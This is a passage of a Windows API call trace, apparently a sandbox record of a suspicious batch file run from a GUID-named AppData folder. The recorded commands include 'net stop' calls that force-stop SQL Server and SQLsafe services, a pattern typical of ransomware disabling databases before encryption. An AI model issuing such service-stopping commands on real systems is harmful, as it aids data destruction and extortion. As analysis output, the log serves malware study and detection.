lpValue=0x0) returned 1 [0218.232] GetProcessHeap () returned 0x3e0000 [0218.233] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.233] GetEnvironmentStringsW () returned 0x3f8408* [0218.233] GetProcessHeap () returned 0x3e0000 [0218.233] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.233] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.233] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0218.379] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0218.379] CloseHandle (hObject=0x78) returned 1 [0218.379] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0218.379] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0218.379] GetProcessHeap () returned 0x3e0000 [0218.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.379] GetEnvironmentStringsW () returned 0x3f8408* [0218.379] GetProcessHeap () returned 0x3e0000 [0218.379] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.380] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.380] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.380] GetProcessHeap () returned 0x3e0000 [0218.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.380] GetEnvironmentStringsW () returned 0x3f8408* [0218.380] GetProcessHeap () returned 0x3e0000 [0218.380] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.380] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.380] GetProcessHeap () returned 0x3e0000 [0218.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0218.380] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0218.380] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.381] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0218.381] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.381] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0218.381] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.381] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0218.381] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.381] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0218.381] SetConsoleInputExeNameW () returned 0x1 [0218.381] GetConsoleOutputCP () returned 0x1b5 [0218.382] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0218.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0218.382] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0218.382] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.382] SetFilePointer (in: hFile=0x78, lDistanceToMove=6110, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x17de [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0218.382] GetProcessHeap () returned 0x3e0000 [0218.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0218.383] GetProcessHeap () returned 0x3e0000 [0218.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0218.383] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.383] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x17de [0218.383] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xe3, lpOverlapped=0x0) returned 1 [0218.383] SetFilePointer (in: hFile=0x78, lDistanceToMove=6150, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1806 [0218.383] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=40, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLFDLauncher$SHAREPOINT /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 40 [0218.383] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.383] GetFileType (hFile=0x78) returned 0x1 [0218.383] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.383] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1806 [0218.383] GetProcessHeap () returned 0x3e0000 [0218.383] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0218.383] GetProcessHeap () returned 0x3e0000 [0218.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0218.387] _tell (_FileHandle=3) returned 6150 [0218.387] _close (_FileHandle=3) returned 0 [0218.387] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0218.387] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0218.387] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0218.387] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0218.387] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0218.387] _wcsicmp (_String1="net", _String2="CD") returned 11 [0218.387] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0218.387] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0218.387] _wcsicmp (_String1="net", _String2="REN") returned -4 [0218.387] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0218.387] _wcsicmp (_String1="net", _String2="SET") returned -5 [0218.387] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0218.388] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0218.388] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0218.388] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0218.388] _wcsicmp (_String1="net", _String2="MD") returned 1 [0218.388] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0218.388] _wcsicmp (_String1="net", _String2="RD") returned -4 [0218.388] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0218.388] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0218.388] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0218.388] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0218.388] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0218.388] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0218.388] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0218.388] _wcsicmp (_String1="net", _String2="VER") returned -8 [0218.388] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0218.388] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0218.388] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0218.388] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0218.388] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0218.388] _wcsicmp (_String1="net", _String2="START") returned -5 [0218.388] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0218.388] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0218.388] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0218.388] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0218.388] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0218.388] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0218.388] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0218.388] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0218.388] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0218.388] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0218.389] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0218.389] SetErrorMode (uMode=0x0) returned 0x1 [0218.389] GetProcessHeap () returned 0x3e0000 [0218.389] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0218.389] GetProcessHeap () returned 0x3e0000 [0218.389] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0218.389] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.389] GetProcessHeap () returned 0x3e0000 [0218.389] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0218.389] GetProcessHeap () returned 0x3e0000 [0218.389] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0218.390] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0218.390] GetProcessHeap () returned 0x3e0000 [0218.390] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0218.390] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.390] GetProcessHeap () returned 0x3e0000 [0218.390] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0218.390] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0218.390] GetProcessHeap () returned 0x3e0000 [0218.390] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0218.391] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.391] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.391] GetLastError () returned 0x2 [0218.392] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.392] GetLastError () returned 0x2 [0218.392] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.393] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.393] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.393] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.393] GetLastError () returned 0x2 [0218.394] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.394] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.394] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.394] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0218.395] SetErrorMode (uMode=0x0) returned 0x1 [0218.395] GetProcessHeap () returned 0x3e0000 [0218.395] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0218.395] GetProcessHeap () returned 0x3e0000 [0218.395] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0218.395] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.395] GetProcessHeap () returned 0x3e0000 [0218.395] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0218.395] GetProcessHeap () returned 0x3e0000 [0218.395] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0218.396] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0218.396] GetProcessHeap () returned 0x3e0000 [0218.396] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0218.396] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.396] GetProcessHeap () returned 0x3e0000 [0218.396] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0218.396] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0218.396] GetProcessHeap () returned 0x3e0000 [0218.396] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0218.396] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.397] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.397] GetLastError () returned 0x2 [0218.397] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.397] GetLastError () returned 0x2 [0218.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.398] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0218.398] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0218.399] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.399] GetLastError () returned 0x2 [0218.399] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0218.399] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0218.400] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.400] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0218.400] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0218.400] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0218.400] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.400] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLFDLauncher$SHAREPOINT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLFDLauncher$SHAREPOINT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLFDLauncher$SHAREPOINT /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x844, dwThreadId=0x864)) returned 1 [0218.405] CloseHandle (hObject=0x78) returned 1 [0218.405] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.405] GetProcessHeap () returned 0x3e0000 [0218.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.405] GetEnvironmentStringsW () returned 0x3f8408* [0218.405] GetProcessHeap () returned 0x3e0000 [0218.405] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.405] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.405] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0218.539] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0218.539] CloseHandle (hObject=0x74) returned 1 [0218.539] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0218.539] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0218.539] GetProcessHeap () returned 0x3e0000 [0218.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.539] GetEnvironmentStringsW () returned 0x3f8408* [0218.539] GetProcessHeap () returned 0x3e0000 [0218.539] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.539] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.539] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.539] GetProcessHeap () returned 0x3e0000 [0218.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.539] GetEnvironmentStringsW () returned 0x3f8408* [0218.540] GetProcessHeap () returned 0x3e0000 [0218.540] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.540] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.540] GetProcessHeap () returned 0x3e0000 [0218.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0218.540] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0218.540] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.540] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0218.540] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.540] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0218.540] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.540] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0218.540] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.540] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0218.541] SetConsoleInputExeNameW () returned 0x1 [0218.541] GetConsoleOutputCP () returned 0x1b5 [0218.541] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0218.541] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0218.541] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0218.541] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.541] SetFilePointer (in: hFile=0x74, lDistanceToMove=6150, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1806 [0218.541] GetProcessHeap () returned 0x3e0000 [0218.541] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0218.541] GetProcessHeap () returned 0x3e0000 [0218.541] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0218.541] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0218.542] GetProcessHeap () returned 0x3e0000 [0218.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0218.542] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.542] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1806 [0218.542] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xbb, lpOverlapped=0x0) returned 1 [0218.542] SetFilePointer (in: hFile=0x74, lDistanceToMove=6192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1830 [0218.542] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=42, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£SQLsafe Filter ServiceΓÇ¥ 